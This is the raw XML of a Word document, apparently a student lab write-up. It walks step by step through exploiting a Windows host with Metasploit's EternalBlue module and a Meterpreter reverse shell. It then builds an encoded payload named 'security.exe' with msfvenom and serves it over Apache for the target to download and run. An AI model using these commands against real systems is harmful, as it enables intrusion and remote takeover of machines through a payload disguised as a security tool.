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BD622" w14:textId="77777777" w:rsidR="001118F2" w:rsidRPr="00D43CA5" w:rsidRDefault="001118F2" w:rsidP="001118F2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43CA5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Step1 Fire up Kali and Start the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D43CA5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5D12B150" w14:textId="77777777" w:rsidR="001118F2" w:rsidRPr="00D43CA5" w:rsidRDefault="001118F2" w:rsidP="001118F2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43CA5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">kali &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D43CA5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="31293789" w14:textId="77777777" w:rsidR="001118F2" w:rsidRPr="00D43CA5" w:rsidRDefault="001118F2" w:rsidP="001118F2">
      <w:pPr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</w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="226ED8C6" wp14:editId="117EE9EA">
            <wp:extent cx="5854065" cy="4350327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53" t="15600" r="26612" b="8055"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5870644" cy="436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3CA5">
        <w:rPr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br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="154444B6" w14:textId="77777777" w:rsidR="001118F2" w:rsidRPr="00D43CA5" w:rsidRDefault="001118F2" w:rsidP="001118F2">
      <w:pPr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Step2 Use Eternal Blue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770CA798" w14:textId="77777777" w:rsidR="001118F2" w:rsidRPr="00D43CA5" w:rsidRDefault="001118F2" w:rsidP="001118F2">
      <w:pPr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search ms17_010</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B867C3D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use exploit/windows/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smb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/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3158FA1E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  <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CE08282" wp14:editId="5BFBA086">
            <wp:extent cx="5731510" cy="962891"/>
            <wp:effectExtent l="0" t="0" r="254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325" cy="9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0F17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4CFB60D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5F88029D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FD91E78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4772CED7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Step3 Set the Payload and options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A75E1A7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set payload windows/x64/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meterpreter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/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reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="375E8B73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 xml:space="preserve"> &gt; set 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>lhost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 xml:space="preserve"> 192.168.1.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41189511" w14:textId="77777777" w:rsidR="001118F2" w:rsidRPr="00D43CA5" w:rsidRDefault="001118F2" w:rsidP="001118F2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1176"/>
        </w:tabs>
        <w:rPr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lastRenderedPageBreak/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 xml:space="preserve"> &gt; set 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>rhost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</w:rPr>
        <w:t xml:space="preserve"> 192.168.1.103</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671B824B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show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25625E46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  <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F4A12B7" wp14:editId="37BCCEBF">
            <wp:extent cx="6062345" cy="399178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9894"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6353605" cy="41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73E7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03B641E8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  <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61544E2D" wp14:editId="7A47F78D">
            <wp:extent cx="6075045" cy="457200"/>
            <wp:effectExtent l="0" t="0" r="190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80" b="80868"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6145163" cy="46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B24B9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008C6C9B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  <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35F0C8F2" wp14:editId="7159B4F7">
            <wp:extent cx="6062405" cy="3251200"/>
            <wp:effectExtent l="0" t="0" r="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686"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6109867" cy="327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2DE9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B010593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13FBF77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35A11F68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013EB745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5E09876A" w14:textId="77777777" w:rsidR="001118F2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2E9CD3F0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517B68BE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Step6 Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066E109A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lastRenderedPageBreak/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exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00D43CA5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19806BC2" wp14:editId="6EB2A70C">
            <wp:extent cx="5437909" cy="3244912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313" cy="324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3AD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Step7 Make payload and upload it online</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04512260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msfvenom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-p windows/x64/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meterpreter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/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reverse_tcp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-a x64 --platform windows -e x86/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shikata_ga_nai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-</w:t>
      </w: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i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10 -f exe &gt; security.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A07E23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cp security.exe var/www/html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2313E693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msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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&gt; service apache2 start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D81516B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51D62AA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</w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56BF72B1" wp14:editId="099FC98B">
            <wp:extent cx="6048447" cy="2549237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20066" t="45553" r="26877" b="14691"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6073159" cy="255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F0A13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012272F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03761D54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Step8 Open the payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654FDEAE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>Go to windows and type on internet explorer 192.168.1.101/security.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441E97C5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</w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="520399C9" wp14:editId="6F2F8803">
            <wp:extent cx="6135521" cy="3429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5" t="16544" r="18418" b="9962"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6146311" cy="343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4B1433F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F6DAA30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Set9 Run the downloaded file </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D26FFA1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</w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D81CCAF" wp14:editId="47961723">
            <wp:extent cx="5731510" cy="32238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7A2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</w:p>
    <w:p w14:paraId="72AAFB03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0"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43CA5">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="292F33"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Set10 Exploit complete  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246CA823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7"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43CA5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64027114" wp14:editId="4CB90486">
            <wp:extent cx="5731510" cy="3421380"/>
            <wp:effectExtent l="0" t="0" r="254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1EE7" w14:textId="77777777" w:rsidR="001118F2" w:rsidRPr="00D43CA5" w:rsidRDefault="001118F2" w:rsidP="001118F2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1176"/>
        </w:tabs>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292F33"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="495D7C1A" w14:textId="77777777" w:rsidR="001118F2" w:rsidRPr="00D43CA5" w:rsidRDefault="001118F2" w:rsidP="001118F2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25D0F073" w14:textId="77777777" w:rsidR="00DC729B" w:rsidRPr="001118F2" w:rsidRDefault="00DC729B" w:rsidP="001118F2"/>
    <w:sectPr w:rsidR="00DC729B" w:rsidRPr="00111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7B12CC5C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E4"/>
    <w:rsid w:val="001118F2"/>
    <w:rsid w:val="00480B78"/>
    <w:rsid w:val="00732EC3"/>
    <w:rsid w:val="009638E4"/>
    <w:rsid w:val="00B3251D"/>
    <w:rsid w:val="00DC729B"/>
    <w:rsid w:val="00DD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0630"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{09AD53BB-406A-462E-9E9C-8591D2B4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8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38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3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9638E4"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="xzvds">
    <w:name w:val="xzvds"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00963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116</Words>
  <Characters>661</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>38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yukti19csu366</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>yukti19csu366</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-05-17T15:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-12T05:50:00Z</dcterms:modified>
</cp:coreProperties>
</file>